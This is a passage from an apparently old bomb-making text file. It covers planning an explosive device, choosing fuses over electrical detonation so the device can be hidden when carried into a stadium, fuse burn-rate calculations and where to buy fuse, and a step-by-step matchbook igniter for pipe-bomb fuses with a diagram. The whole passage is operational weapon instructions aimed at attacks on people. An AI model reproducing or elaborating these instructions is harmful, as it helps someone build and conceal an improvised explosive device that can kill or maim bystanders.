The first step that a person that would use explosive would take would
be to determine how big an explosiv
e device would be needed to do whatever had
to be done. Then, he would have to decide what to make his bomb with. He would
also have to decide on how he wanted to detonate the device, and determine
where the best placement for it would be. Then, it would be necessary to see
if the device could be put where he wanted it without it being discovered or
moved. Finally, he would actually have to sit down and build his explosive
device. These are some of the topics covered in the next section.

There is no such thing as a "safe" explosive device. One can only speak
in terms of relative safety, or less unsafe.

There are many ways to ignite explosive devices. There is the classic
"light the fuse, throw the bomb, and run" approach, and there are sensitive
mercury switches, and many things in between. Generally, electrical detonation
systems are safer than fuses, but there are times when fuses are more
appropriate than electrical systems; it is difficult to carr
y an electrical
detonation system into a stadium, for instance, without being caught. A device
with a fuse or impact detonating fuse would be easier to hide.


The oldest form of explosive ignition, fuses are perhaps the favorite
type of simple ignition system. By simply placing a piece of waterproof fuse in
a device, one can have almost guaranteed ignition. Modern waterproof fuse is
extremely reliable, burning at a rate of about 2.5 seconds to the inch. It is
available as model rocketry fuse in most hobby shops, and costs about $3.00 for
a nine-foot length. Fuse is a popular ignition system for pipe bombers because
of its simplicity. All that need be done is light it with a match or lighter.
Of course, if the Army had fuses like this, then the grenade, which uses
fuse ignition, would be very impracticle. If a grenade ignition system can be
acquired, by all means, it is the most effective. But, since such things do not
just float around, the next best thing is
to prepare a fuse system which does
not require the use of a match or lighter, but still retains its simplicity.
One such method is described below:

strike-on-cover type matches
electrical tape or duct tape
waterproof fuse
1) To determine the burn rate of a particular type of fuse, simply measure a
6 inch or longer piece of fuse and ignite it. With a stopwatch, press the
start button the at the instant when the fuse lights, and stop the watch when
the fuse reaches its end. Divide the time of burn by the length of fuse, and
you have the burn rate of the fuse, in seconds per inch. This will be shown
Suppose an eight inch piece of fuse is burned, and its complete time
of combustion is 20 seconds.

20 seconds
ÄÄÄÄÄÄÄÄÄÄ = 2.5 seconds per inch.
8 inches

If a delay of 10 seconds was desired with this fuse, divide the desired
time by the number of seconds per inch:
10 seconds
ÄÄÄÄÄÄÄ = 4 inches
2.5 seconds / inch

2) After deciding how long a delay is desired before the explosive device is
to go off, add about 1/2 an inch to the premeasured amount of fuse, and
cut it off.

3) Carefully remove the cardboard matches from the paper match case. Do not
pull off individual matches; keep all the matches attached to the cardboard
base. Take one of the cardboard match sections, and leave the other one
to make a second igniter.
4) Wrap the matches around the end of the fuse, with the heads of the matches
touching the very end of the fuse. Tape them there securely, making sure not
to put tape over the match heads. Make sure they are very secure by pulling
on them at the base of the assembly. They should not be able to move.
5) Wrap the
cover of the matches around the matches attached to the fuse, making
sure that the striker paper is below the match heads and the striker faces
the match heads. Tape the paper so that is fairly tight around the matches.
Do not tape the cover of the striker to the fuse or to the matches. Leave
enough of the match book to pull on for ignition.
\ /
\ / ------ match book cover
\ /
| M|f|M ---|------- match head
| A|u|A |
| T|s|T |
| C|e|C |
| |f| |
|#####|u|#####|-------- striking paper
\ |e| /
\ |.| /
\ |f| /
\ |u| /

The match book is wrapped around the matches, and is taped to itself.
The matches are taped to the fuse. The striker will rub against the
matcheads when the match book is pulled.
